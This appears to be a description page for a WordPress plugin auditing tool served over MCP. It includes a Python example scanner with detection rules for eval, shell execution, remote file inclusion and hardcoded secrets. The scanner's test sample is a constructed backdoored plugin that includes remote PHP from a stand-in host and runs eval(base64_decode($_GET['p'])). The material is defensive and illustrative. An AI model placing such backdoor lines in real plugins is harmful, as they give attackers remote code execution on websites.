wp-plugin-auditor
Scans WordPress plugins for vulnerabilities, malicious code, and security risks over the MCP protocol. Generates detailed reports with risk assessments and fix recommendations. WordPress developers, site administrators, and security teams use it to vet plugins before deploying them to production sites.
Overview
The wp-plugin-auditor MCP server enables programmatic auditing of WordPress plugins. It examines plugin files, metadata, and dependencies against vulnerability databases, static code analysis rules, and WordPress security standards to identify threats like backdoors, XSS flaws, and outdated libraries.
Key Capabilities
- scan_plugin: Analyzes a plugin ZIP or directory for known CVEs, suspicious constructs (e.g., eval() calls, remote file inclusion), and hardcoded secrets.
- vulnerability_check: Queries a plugin against CVE databases and WP-specific advisories, returning severity scores.
- report_generate: Compiles findings into JSON or HTML reports with remediation guidance.
- dependency_audit: Verifies third-party libraries in plugins for vulnerabilities.
These functions integrate into CI/CD pipelines or custom scripts for automated checks.
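The static-analysis side of scan_plugin can be illustrated with a small rule-based PHP scanner. The following is an added example written for this page, not the auditor's own code: the rule set, field names, and the sample plugin file are all constructed here, and the real server's rules and output format are not described above.

```python
import re

# Detection rules: (id, severity, regex). Constructed for this example; the
# auditor's real rule set is not described on the page.
RULES = [
    ("eval-usage", "high", re.compile(r"\beval\s*\(")),
    ("remote-file-inclusion", "critical",
     re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://")),
    ("shell-execution", "high",
     re.compile(r"\b(system|shell_exec|passthru|exec)\s*\(")),
    ("base64-obfuscation", "medium", re.compile(r"\bbase64_decode\s*\(")),
    ("hardcoded-secret", "high",
     re.compile(r"(?i)\b(api_key|secret|password|token)\b\s*[=:]\s*['\"][^'\"]{8,}['\"]")),
]

def scan_php_source(name, source):
    """Return findings (file, line, rule, severity, snippet) for one PHP file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue  # skip obvious comment lines to reduce noise
        for rule_id, severity, pattern in RULES:
            if pattern.search(line):
                findings.append({"file": name, "line": lineno, "rule": rule_id,
                                 "severity": severity, "snippet": stripped[:80]})
    return findings

def risk_level(findings):
    """Collapse findings into one overall risk label for a report."""
    present = {f["severity"] for f in findings}
    return next((s for s in ("critical", "high", "medium", "low") if s in present), "clean")

# Constructed sample of a backdoored plugin file (not a real plugin).
SAMPLE_PLUGIN_PHP = """<?php
/* Plugin Name: Example Widget */
$api_key = "sk_live_0123456789abcdef";
// eval() in a comment should not be flagged
add_action('init', function () {
    include('https://cdn.example.invalid/loader.php');
    eval(base64_decode($_GET['p']));
});
"""

if __name__ == "__main__":
    found = scan_php_source("example-widget.php", SAMPLE_PLUGIN_PHP)
    for f in found:
        print(f"{f['severity']:8} {f['rule']:22} line {f['line']}: {f['snippet']}")
    print("overall risk:", risk_level(found))
```

Pattern matching of this kind produces false positives (a legitimate eval() in a templating library, for instance), so findings are best treated as review queues that a human or the vulnerability database cross-checks, not as verdicts.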
Use Cases
- Pre-deployment scanning: Developers run scan_plugin on new plugins during build processes to block risky installs.
- Site hardening: Administrators audit active plugins site-wide using vulnerability_check to prioritize updates.
- Agency workflows: Teams batch-audit client plugins with report_generate for compliance reports.
- Hosting provider monitoring: Automated dependency_audit runs on tenant uploads enforce security policies.
Who This Is For
WordPress developers integrating security into DevOps, site owners maintaining plugin inventories, security auditors reviewing WP ecosystems, and hosting platforms enforcing plugin standards. Requires a basic MCP client setup for API access.